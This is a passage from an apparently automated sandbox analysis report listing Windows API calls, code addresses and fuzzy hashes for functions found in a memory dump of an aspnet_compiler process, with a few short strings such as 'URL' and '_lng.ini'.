                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                                                                                                                                                                                                                                  • RegisterClassW.USER32(?), ref: 00412428
                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                                                                                                                                                                                                  • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2678498856-0
                                                                                                                                                                                                                                                                  • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                                                                                                                                                                                  • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MessageSend$Item
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3888421826-0
                                                                                                                                                                                                                                                                  • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                                                                                                                                                                                  • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00417B7B
                                                                                                                                                                                                                                                                  • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                                                                                                                                                                                                                  • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00417BB5
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: File$ErrorLastLockUnlockmemset
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3727323765-0
                                                                                                                                                                                                                                                                  • Opcode ID: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                                                                                                                                                                                                  • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                                                                                                                                                                                                  • malloc.MSVCRT ref: 00417407
                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00417425
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide$??3@malloc
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 4284152360-0
                                                                                                                                                                                                                                                                  • Opcode ID: 2d709113fcafe1a04d94ccb325df1834664bd2c227d6907f8f745ae81c56706a
                                                                                                                                                                                                                                                                  • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2d709113fcafe1a04d94ccb325df1834664bd2c227d6907f8f745ae81c56706a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040F673
                                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                                                                                                                                                                                                                                  • strlen.MSVCRT ref: 0040F6A2
                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2754987064-0
                                                                                                                                                                                                                                                                  • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                                                                                                                                                                                  • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040F6E2
                                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                                                                                                                                                                                                                                  • strlen.MSVCRT ref: 0040F70D
                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2754987064-0
                                                                                                                                                                                                                                                                  • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                                                                                                                                                                                                  • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00402FD7
                                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                                                                                                                                                                                                                                  • strlen.MSVCRT ref: 00403006
                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2754987064-0
                                                                                                                                                                                                                                                                  • Opcode ID: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                                                                                                                                                                                                                  • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                                                                                                                                                                                                    • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                                                                                                                                                                                                    • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                                                                                                                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                                                                                                                                                                                                  • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                                                                                                                                                                                                  • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                                                                                                                                                                                                  • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 764393265-0
                                                                                                                                                                                                                                                                  • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                                                                                                                                                                  • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                                                                                                                                                                                                  • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                                                                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Time$System$File$LocalSpecific
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 979780441-0
                                                                                                                                                                                                                                                                  • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                                                                                                                                                                  • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 004134E0
                                                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 004134F2
                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                                                                                                                                                                                                  • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: memcpy$DialogHandleModuleParam
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1386444988-0
                                                                                                                                                                                                                                                                  • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                                                                                                                                                                  • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                                                                                                                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InvalidateMessageRectSend
                                                                                                                                                                                                                                                                  • String ID: d=E
                                                                                                                                                                                                                                                                  • API String ID: 909852535-3703654223
                                                                                                                                                                                                                                                                  • Opcode ID: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                                                                                                                                                                                                                                  • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • wcschr.MSVCRT ref: 0040F79E
                                                                                                                                                                                                                                                                  • wcschr.MSVCRT ref: 0040F7AC
                                                                                                                                                                                                                                                                    • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040AA8C: memcpy.MSVCRT ref: 0040AACB
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: wcschr$memcpywcslen
                                                                                                                                                                                                                                                                  • String ID: "
                                                                                                                                                                                                                                                                  • API String ID: 1983396471-123907689
                                                                                                                                                                                                                                                                  • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                                                                                                                                                                                                  • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                                                                                                                                                  • _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 0040C024
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FilePointer_memicmpmemcpy
                                                                                                                                                                                                                                                                  • String ID: URL
                                                                                                                                                                                                                                                                  • API String ID: 2108176848-3574463123
                                                                                                                                                                                                                                                                  • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                                                                                                                                                                                  • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _snwprintfmemcpy
                                                                                                                                                                                                                                                                  • String ID: %2.2X
                                                                                                                                                                                                                                                                  • API String ID: 2789212964-323797159
                                                                                                                                                                                                                                                                  • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                                                                                                                                                                                  • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _snwprintf
                                                                                                                                                                                                                                                                  • String ID: %%-%d.%ds
                                                                                                                                                                                                                                                                  • API String ID: 3988819677-2008345750
                                                                                                                                                                                                                                                                  • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                                                                                                                                                                                                  • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040E770
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MessageSendmemset
                                                                                                                                                                                                                                                                  • String ID: F^@
                                                                                                                                                                                                                                                                  • API String ID: 568519121-3652327722
                                                                                                                                                                                                                                                                  • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                                                                                                                                                                                                  • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: PlacementWindowmemset
                                                                                                                                                                                                                                                                  • String ID: WinPos
                                                                                                                                                                                                                                                                  • API String ID: 4036792311-2823255486
                                                                                                                                                                                                                                                                  • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                                                                                                                                                                                                  • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                                                                                                  • wcsrchr.MSVCRT ref: 0040DCE9
                                                                                                                                                                                                                                                                  • wcscat.MSVCRT ref: 0040DCFF
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FileModuleNamewcscatwcsrchr
                                                                                                                                                                                                                                                                  • String ID: _lng.ini
                                                                                                                                                                                                                                                                  • API String ID: 383090722-1948609170
